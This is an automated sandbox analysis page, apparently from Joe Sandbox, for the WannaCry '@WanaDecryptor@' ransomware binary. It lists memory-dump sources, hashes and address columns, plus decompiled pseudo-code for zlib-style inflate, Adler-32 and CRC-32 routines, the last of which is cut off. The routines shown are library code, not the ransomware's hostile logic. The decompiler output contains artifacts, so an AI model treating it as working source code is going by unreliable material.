                                  0x004107d5
                                  0x004107da
                                  0x004107ea
                                  0x004107f0
                                  0x004107fd
                                  0x00410803
                                  0x00410805
                                  0x0041080b
                                  0x0041080f
                                  0x0041081c
                                  0x004107dc
                                  0x004107e2
                                  0x004107e2
                                  0x00000000
                                  0x00000000
                                  0x00410821
                                  0x00410827
                                  0x0041082a
                                  0x00410832
                                  0x0041083a
                                  0x00410840
                                  0x00000000
                                  0x00000000
                                  0x0041059c
                                  0x0041059d
                                  0x0041059e
                                  0x004105a4
                                  0x004105a6
                                  0x004105ac
                                  0x004105c8
                                  0x004105ca
                                  0x004105ca
                                  0x004105cf
                                  0x00000000
                                  0x004105d5
                                  0x004105d5
                                  0x004105d8
                                  0x004105e3
                                  0x004105e8
                                  0x004105f3
                                  0x00410600
                                  0x00000000
                                  0x004105f5
                                  0x004105f5
                                  0x00000000
                                  0x004105f5
                                  0x004105f3
                                  0x004105ae
                                  0x004105b1
                                  0x004105b7
                                  0x004105ba
                                  0x00000000
                                  0x004105ba
                                  0x00000000
                                  0x00000000
                                  0x00410606
                                  0x00410606
                                  0x0041060b
                                  0x00000000
                                  0x00410611
                                  0x00410615
                                  0x0041061b
                                  0x0041061e
                                  0x00410621
                                  0x00410623
                                  0x0041062a
                                  0x0041062f
                                  0x00410630
                                  0x00410632
                                  0x00410635
                                  0x00000000
                                  0x00410635
                                  0x00000000
                                  0x00000000
                                  0x0041063b
                                  0x0041063b
                                  0x00410640
                                  0x00000000
                                  0x00410646
                                  0x0041064b
                                  0x0041064d
                                  0x00410650
                                  0x00410653
                                  0x0041065a
                                  0x00410664
                                  0x00410669
                                  0x0041066a
                                  0x0041066c
                                  0x0041066f
                                  0x00000000
                                  0x0041066f
                                  0x00000000
                                  0x00000000
                                  0x00410675
                                  0x00410675
                                  0x0041067a
                                  0x00000000
                                  0x00410680
                                  0x00410685
                                  0x00410687
                                  0x0041068a
                                  0x0041068d
                                  0x00410694
                                  0x0041069e
                                  0x004106a3
                                  0x004106a4
                                  0x004106a6
                                  0x004106a9
                                  0x00000000
                                  0x004106a9
                                  0x00000000
                                  0x00000000
                                  0x004106af
                                  0x004106af
                                  0x004106b4
                                  0x0041072e
                                  0x00410734
                                  0x004106b6
                                  0x004106bd
                                  0x004106c0
                                  0x004106c3
                                  0x004106cf
                                  0x004106d1
                                  0x004106d6
                                  0x004106d7
                                  0x004106d9
                                  0x004106e4
                                  0x00410844
                                  0x00000000
                                  0x004106ea
                                  0x004106ea
                                  0x004106f0
                                  0x004106f7
                                  0x004106fa
                                  0x00000000
                                  0x004106fa
                                  0x004106e4
                                  0x00000000
                                  0x00000000
                                  0x0041084d
                                  0x0041084d
                                  0x00410853
                                  0x00000000
                                  0x00000000
                                  0x00410857
                                  0x0041085d
                                  0x00000000
                                  0x00000000
                                  0x004106fd
                                  0x004106fd
                                  0x00410700
                                  0x00410702
                                  0x004104ad
                                  0x004104a2
                                  0x00000000
                                  0x00410475
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                  • Instruction ID: d75a74fb3a0dfdb81fbbcc262e1caa4e3a0368247a27923ffbf4d457c3a86cdc
                                  • Opcode Fuzzy Hash: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                  • Instruction Fuzzy Hash: E4E105B5600A018FD334CF19D490A62FBF2EF89310B25C96ED4AACB761D775E886CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FBC0 Relevance: .4, Instructions: 359COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0040FBC0() {
				signed int _t153;
				unsigned int _t155;
				unsigned int _t161;
				signed char _t173;
				signed int _t176;
				intOrPtr _t177;
				signed int _t178;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				signed int _t200;
				intOrPtr _t201;
				signed int _t204;
				signed int _t212;
				signed int _t219;
				signed int _t235;
				signed int _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr* _t249;
				signed int _t252;
				signed int _t261;
				signed int _t267;
				unsigned int _t270;
				unsigned int _t273;
				char* _t279;
				char* _t280;
				char* _t281;
				char* _t282;
				char* _t283;
				intOrPtr _t284;
				intOrPtr _t285;
				void* _t286;
				intOrPtr* _t287;
				signed int _t289;
				intOrPtr _t290;
				void* _t291;
				intOrPtr* _t295;
				intOrPtr* _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				signed int _t305;
				signed int _t309;
				intOrPtr* _t313;
				intOrPtr _t317;
				void* _t320;
				intOrPtr _t321;
				signed int _t323;
				intOrPtr _t325;
				intOrPtr _t326;
				signed int _t327;
				void* _t328;
				void* _t330;
				void* _t331;

				_t153 =  *(_t331 + 0x2c);
				_t204 =  *(_t331 + 0x28);
				_t316 =  *_t153;
				_t270 =  *(_t204 + 0x20);
				_t284 =  *((intOrPtr*)(_t204 + 0x30));
				_t279 =  *((intOrPtr*)(_t204 + 0x34));
				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
				_t155 =  *(_t204 + 0x1c);
				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
				if(_t279 >= _t284) {
					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
				} else {
					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
				}
				 *(_t331 + 0x1c) =  *(0x41a260 +  *(_t331 + 0x28) * 4);
				 *(_t331 + 0x20) =  *(0x41a260 +  *(_t331 + 0x2c) * 4);
				L4:
				while(1) {
					if(_t155 < 0x14) {
						do {
							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
							_t289 = 0 << _t155;
							_t155 = _t155 + 8;
							_t270 = _t270 | _t289;
							_t316 = _t316 + 1;
						} while (_t155 < 0x14);
						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
					}
					_t285 =  *((intOrPtr*)(_t331 + 0x30));
					_t212 =  *(_t331 + 0x1c) & _t270;
					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
					_t286 = _t285 + _t212 * 8;
					if(0 == 0) {
						L35:
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *_t279 =  *((intOrPtr*)(_t286 + 4));
						_t279 = _t279 + 1;
						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
						goto L36;
					} else {
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *(_t331 + 0x28) = 0;
						if((_t173 & 0x00000010) != 0) {
							L12:
							_t178 = _t173 & 0x0000000f;
							_t161 = _t155 - _t178;
							 *(_t331 + 0x2c) = ( *(0x41a260 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
							_t273 = _t270 >> _t178;
							if(_t161 < 0xf) {
								do {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t309 = 0 << _t161;
									_t161 = _t161 + 8;
									_t273 = _t273 | _t309;
									_t316 = _t316 + 1;
								} while (_t161 < 0xf);
								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
							}
							_t290 =  *((intOrPtr*)(_t331 + 0x34));
							_t235 =  *(_t331 + 0x20) & _t273;
							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
							_t291 = _t290 + _t235 * 8;
							_t270 = _t273 >>  *(_t291 + 1);
							_t155 = _t161;
							 *(_t331 + 0x28) = 0;
							if((_t180 & 0x00000010) != 0) {
								L18:
								_t181 = _t180 & 0x0000000f;
								while(_t155 < _t181) {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t323 = 0 << _t155;
									_t155 = _t155 + 8;
									_t270 = _t270 | _t323;
									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
								}
								_t320 = ( *(0x41a260 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
								_t270 = _t270 >> _t181;
								_t240 =  *(_t331 + 0x2c);
								_t155 = _t155 - _t181;
								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
								_t295 = _t279 - _t320;
								_t321 =  *((intOrPtr*)(_t331 + 0x38));
								_t182 =  *((intOrPtr*)(_t321 + 0x28));
								if(_t295 >= _t182) {
									 *_t279 =  *_t295;
									_t280 = _t279 + 1;
									 *_t280 =  *((intOrPtr*)(_t295 + 1));
									_t281 = _t280 + 1;
									_t297 = _t295 + 2;
									_t241 = _t240 - 2;
									do {
										 *_t281 =  *_t297;
										_t281 = _t281 + 1;
										_t297 = _t297 + 1;
										_t241 = _t241 - 1;
									} while (_t241 != 0);
									_t316 =  *((intOrPtr*)(_t331 + 0x18));
								} else {
									_t327 =  *(_t321 + 0x2c);
									 *(_t331 + 0x28) = _t327;
									_t328 = _t327 - _t182;
									do {
										_t295 = _t295 + _t328;
									} while (_t295 < _t182);
									_t330 =  *(_t331 + 0x28) - _t295;
									if(_t240 <= _t330) {
										 *_t279 =  *_t295;
										_t282 = _t279 + 1;
										 *_t282 =  *((intOrPtr*)(_t295 + 1));
										_t283 = _t282 + 1;
										_t299 = _t295 + 2;
										_t242 = _t240 - 2;
										do {
											 *_t283 =  *_t299;
											_t283 = _t283 + 1;
											_t299 = _t299 + 1;
											_t242 = _t242 - 1;
										} while (_t242 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									} else {
										_t243 = _t240 - _t330;
										do {
											 *_t279 =  *_t295;
											_t279 = _t279 + 1;
											_t295 = _t295 + 1;
											_t330 = _t330 - 1;
										} while (_t330 != 0);
										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
										do {
											 *_t279 =  *_t301;
											_t279 = _t279 + 1;
											_t301 = _t301 + 1;
											_t243 = _t243 - 1;
										} while (_t243 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									}
								}
								L36:
								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
									_t176 = _t155 >> 3;
									if(_t176 < _t219) {
										_t219 = _t176;
									}
									_t177 =  *((intOrPtr*)(_t331 + 0x38));
									_t317 = _t316 - _t219;
									 *(_t177 + 0x20) = _t270;
									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
									 *_t287 = _t317;
									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
									return 0;
								} else {
									continue;
								}
							} else {
								while((_t180 & 0x00000040) == 0) {
									_t252 = ( *(0x41a260 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
									_t291 = _t291 + _t252 * 8;
									_t270 = _t270 >>  *(_t291 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t180 & 0x00000010) == 0) {
										continue;
									} else {
										goto L18;
									}
									goto L51;
								}
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid distance code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									goto L49;
								}
								goto L50;
							}
						} else {
							while((_t173 & 0x00000040) == 0) {
								_t267 = ( *(0x41a260 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
								_t286 = _t286 + _t267 * 8;
								if(0 == 0) {
									goto L35;
								} else {
									_t270 = _t270 >>  *(_t286 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t173 & 0x00000010) == 0) {
										continue;
									} else {
										goto L12;
									}
								}
								goto L51;
							}
							if((_t173 & 0x00000020) == 0) {
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid literal/length code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									L49:
									_t305 =  *(_t331 + 0x2c);
								}
								L50:
								_t193 =  *((intOrPtr*)(_t331 + 0x38));
								_t325 = _t316 - _t305;
								 *(_t193 + 0x20) = _t270;
								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t249 = _t325;
								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
								return 0xfffffffd;
							} else {
								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t200 = _t155 >> 3;
								if(_t200 < _t261) {
									_t261 = _t200;
								}
								_t201 =  *((intOrPtr*)(_t331 + 0x38));
								_t326 = _t316 - _t261;
								 *(_t201 + 0x20) = _t270;
								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t313 = _t326;
								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
								return 1;
							}
						}
					}
					L51:
				}
			}



























































                                  0x0040fbc3
                                  0x0040fbc7
                                  0x0040fbcd
                                  0x0040fbd2
                                  0x0040fbd6
                                  0x0040fbda
                                  0x0040fbdd
                                  0x0040fbe1
                                  0x0040fbe6
                                  0x0040fbea
                                  0x0040fbfa
                                  0x0040fbec
                                  0x0040fbef
                                  0x0040fbef
                                  0x0040fc09
                                  0x0040fc18
                                  0x00000000
                                  0x0040fc1c
                                  0x0040fc1f
                                  0x0040fc21
                                  0x0040fc26
                                  0x0040fc33
                                  0x0040fc35
                                  0x0040fc38
                                  0x0040fc3a
                                  0x0040fc3b
                                  0x0040fc40
                                  0x0040fc40
                                  0x0040fc48
                                  0x0040fc4c
                                  0x0040fc50
                                  0x0040fc53
                                  0x0040fc58
                                  0x0040fe15
                                  0x0040fe1a
                                  0x0040fe1c
                                  0x0040fe21
                                  0x0040fe27
                                  0x0040fe29
                                  0x00000000
                                  0x0040fc5e
                                  0x0040fc63
                                  0x0040fc65
                                  0x0040fc67
                                  0x0040fc6e
                                  0x0040fca9
                                  0x0040fca9
                                  0x0040fcac
                                  0x0040fcba
                                  0x0040fcc0
                                  0x0040fcc5
                                  0x0040fcc7
                                  0x0040fccc
                                  0x0040fcd9
                                  0x0040fcdb
                                  0x0040fcde
                                  0x0040fce0
                                  0x0040fce1
                                  0x0040fce6
                                  0x0040fce6
                                  0x0040fcee
                                  0x0040fcf2
                                  0x0040fcf6
                                  0x0040fcf9
                                  0x0040fd01
                                  0x0040fd03
                                  0x0040fd05
                                  0x0040fd0c
                                  0x0040fd3f
                                  0x0040fd3f
                                  0x0040fd44
                                  0x0040fd4b
                                  0x0040fd58
                                  0x0040fd5a
                                  0x0040fd5d
                                  0x0040fd63
                                  0x0040fd66
                                  0x0040fd66
                                  0x0040fd7c
                                  0x0040fd80
                                  0x0040fd82
                                  0x0040fd86
                                  0x0040fd8a
                                  0x0040fd90
                                  0x0040fd92
                                  0x0040fd96
                                  0x0040fd9b
                                  0x0040fdf8
                                  0x0040fdfd
                                  0x0040fdff
                                  0x0040fe01
                                  0x0040fe02
                                  0x0040fe03
                                  0x0040fe06
                                  0x0040fe08
                                  0x0040fe0a
                                  0x0040fe0b
                                  0x0040fe0c
                                  0x0040fe0c
                                  0x0040fe0f
                                  0x0040fd9d
                                  0x0040fd9d
                                  0x0040fda0
                                  0x0040fda4
                                  0x0040fda6
                                  0x0040fda6
                                  0x0040fda8
                                  0x0040fdb0
                                  0x0040fdb4
                                  0x0040fdd9
                                  0x0040fdde
                                  0x0040fde0
                                  0x0040fde2
                                  0x0040fde3
                                  0x0040fde4
                                  0x0040fde7
                                  0x0040fde9
                                  0x0040fdeb
                                  0x0040fdec
                                  0x0040fded
                                  0x0040fded
                                  0x0040fdf0
                                  0x0040fdb6
                                  0x0040fdb6
                                  0x0040fdb8
                                  0x0040fdba
                                  0x0040fdbc
                                  0x0040fdbd
                                  0x0040fdbe
                                  0x0040fdbe
                                  0x0040fdc5
                                  0x0040fdc8
                                  0x0040fdca
                                  0x0040fdcc
                                  0x0040fdcd
                                  0x0040fdce
                                  0x0040fdce
                                  0x0040fdd1
                                  0x0040fdd1
                                  0x0040fdb4
                                  0x0040fe2d
                                  0x0040fe35
                                  0x0040fe71
                                  0x0040fe7c
                                  0x0040fe80
                                  0x0040fe85
                                  0x0040fe87
                                  0x0040fe87
                                  0x0040fe89
                                  0x0040fe8d
                                  0x0040fe8f
                                  0x0040fe9b
                                  0x0040fea9
                                  0x0040feae
                                  0x0040feb4
                                  0x0040feb7
                                  0x0040fec3
                                  0x0040fe3e
                                  0x00000000
                                  0x0040fe3e
                                  0x0040fd0e
                                  0x0040fd0e
                                  0x0040fd23
                                  0x0040fd27
                                  0x0040fd2a
                                  0x0040fd32
                                  0x0040fd34
                                  0x0040fd36
                                  0x0040fd3d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040fd3d
                                  0x0040fe43
                                  0x0040fe4e
                                  0x0040fe57
                                  0x0040fe61
                                  0x0040fe66
                                  0x00000000
                                  0x0040fe6c
                                  0x00000000
                                  0x0040fe66
                                  0x0040fc70
                                  0x0040fc70
                                  0x0040fc85
                                  0x0040fc89
                                  0x0040fc8c
                                  0x0040fc91
                                  0x00000000
                                  0x0040fc97
                                  0x0040fc9c
                                  0x0040fc9e
                                  0x0040fca0
                                  0x0040fca7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040fca7
                                  0x00000000
                                  0x0040fc91
                                  0x0040fec7
                                  0x0040ff1f
                                  0x0040ff2a
                                  0x0040ff33
                                  0x0040ff3d
                                  0x0040ff42
                                  0x0040ff44
                                  0x0040ff44
                                  0x0040ff44
                                  0x0040ff48
                                  0x0040ff48
                                  0x0040ff4c
                                  0x0040ff4e
                                  0x0040ff5c
                                  0x0040ff68
                                  0x0040ff6f
                                  0x0040ff73
                                  0x0040ff76
                                  0x0040ff85
                                  0x0040fec9
                                  0x0040fec9
                                  0x0040fed4
                                  0x0040fed8
                                  0x0040fedd
                                  0x0040fedf
                                  0x0040fedf
                                  0x0040fee1
                                  0x0040fee5
                                  0x0040fee7
                                  0x0040fef3
                                  0x0040ff01
                                  0x0040ff06
                                  0x0040ff0c
                                  0x0040ff0f
                                  0x0040ff1e
                                  0x0040ff1e
                                  0x0040fec7
                                  0x0040fc6e
                                  0x00000000
                                  0x0040fc58

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                  • Instruction ID: 2ca3a7e0973b0a9ded1865a7ec8cc067e044c270efaf411a13bb96b1b7e56096
                                  • Opcode Fuzzy Hash: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                  • Instruction Fuzzy Hash: DDD1B73560C3418FC718CF2CD59016ABBE1EB99310F19497EE9DAA3756C734E819CB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410180 Relevance: .1, Instructions: 127COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410180() {
				unsigned int _t28;
				unsigned int _t35;
				signed int _t38;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				unsigned int _t96;
				signed int _t97;
				unsigned int _t114;
				signed int _t117;
				void* _t119;

				_t114 =  *(_t119 + 0xc);
				_t96 =  *(_t119 + 0xc);
				_t38 = _t96 & 0x0000ffff;
				_t97 = _t96 >> 0x10;
				if(_t114 != 0) {
					_t35 =  *(_t119 + 0x18);
					if(_t35 > 0) {
						do {
							_t28 = _t35;
							if(_t35 >= 0x15b0) {
								_t28 = 0x15b0;
							}
							_t35 = _t35 - _t28;
							if(_t28 >= 0x10) {
								_t117 = _t28 >> 4;
								_t28 = _t28 + ( ~_t117 << 4);
								do {
									_t114 = _t114 + 0x10;
									_t40 = _t38;
									_t41 = _t40;
									_t42 = _t41;
									_t43 = _t42;
									_t44 = _t43;
									_t45 = _t44;
									_t46 = _t45;
									_t47 = _t46;
									_t48 = _t47;
									_t49 = _t48;
									_t50 = _t49;
									_t51 = _t50;
									_t52 = _t51;
									_t53 = _t52;
									_t54 = _t53;
									_t38 = _t54;
									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
									_t117 = _t117 - 1;
								} while (_t117 != 0);
							}
							if(_t28 != 0) {
								do {
									_t38 = _t38;
									_t114 = _t114 + 1;
									_t97 = _t97 + _t38;
									_t28 = _t28 - 1;
								} while (_t28 != 0);
							}
							_t38 = _t38 % 0xfff1;
							_t97 = _t97 % 0xfff1;
						} while (_t35 > 0);
					}
					return _t97 << 0x00000010 | _t38;
				} else {
					return 1;
				}
			}


























                                  0x00410181
                                  0x00410186
                                  0x0041018c
                                  0x00410192
                                  0x00410197
                                  0x004101a2
                                  0x004101a8
                                  0x004101af
                                  0x004101b5
                                  0x004101b7
                                  0x004101b9
                                  0x004101b9
                                  0x004101be
                                  0x004101c3
                                  0x004101cb
                                  0x004101d5
                                  0x004101d7
                                  0x004101db
                                  0x004101de
                                  0x004101e7
                                  0x004101f0
                                  0x004101f9
                                  0x00410202
                                  0x0041020b
                                  0x00410214
                                  0x0041021d
                                  0x00410226
                                  0x0041022f
                                  0x00410238
                                  0x00410241
                                  0x0041024a
                                  0x00410253
                                  0x0041025c
                                  0x00410265
                                  0x00410267
                                  0x00410269
                                  0x00410269
                                  0x004101d7
                                  0x00410272
                                  0x00410274
                                  0x00410278
                                  0x0041027a
                                  0x0041027b
                                  0x0041027d
                                  0x0041027d
                                  0x00410274
                                  0x00410292
                                  0x0041029a
                                  0x0041029a
                                  0x004102a2
                                  0x004102ad
                                  0x0041019a
                                  0x004101a0
                                  0x004101a0

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                  • Instruction ID: 6bb151cab00cdc0290d3db98aa961ff277c67549bb944e7b7c7e1e2eea59e94c
                                  • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                  • Instruction Fuzzy Hash: A1314D3374558203F71DCA2F8CA12FAEAD34FD522872DD57E99C987356ECFA48564104
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FF90 Relevance: .1, Instructions: 109COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040FF90(signed int _a4, intOrPtr _a8, unsigned int _a12) {
				signed int _t29;
				intOrPtr _t76;
				unsigned int _t115;
				unsigned int _t118;

				_t76 = _a8;
				if(_t76 != 0) {
					_t118 = _a12;
					_t29 =  !_a4;
					if(_t118 >= 8) {
						_t115 = _t118 >> 3;
						do {
							_t118 = _t118 - 8;
							_t29 = ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 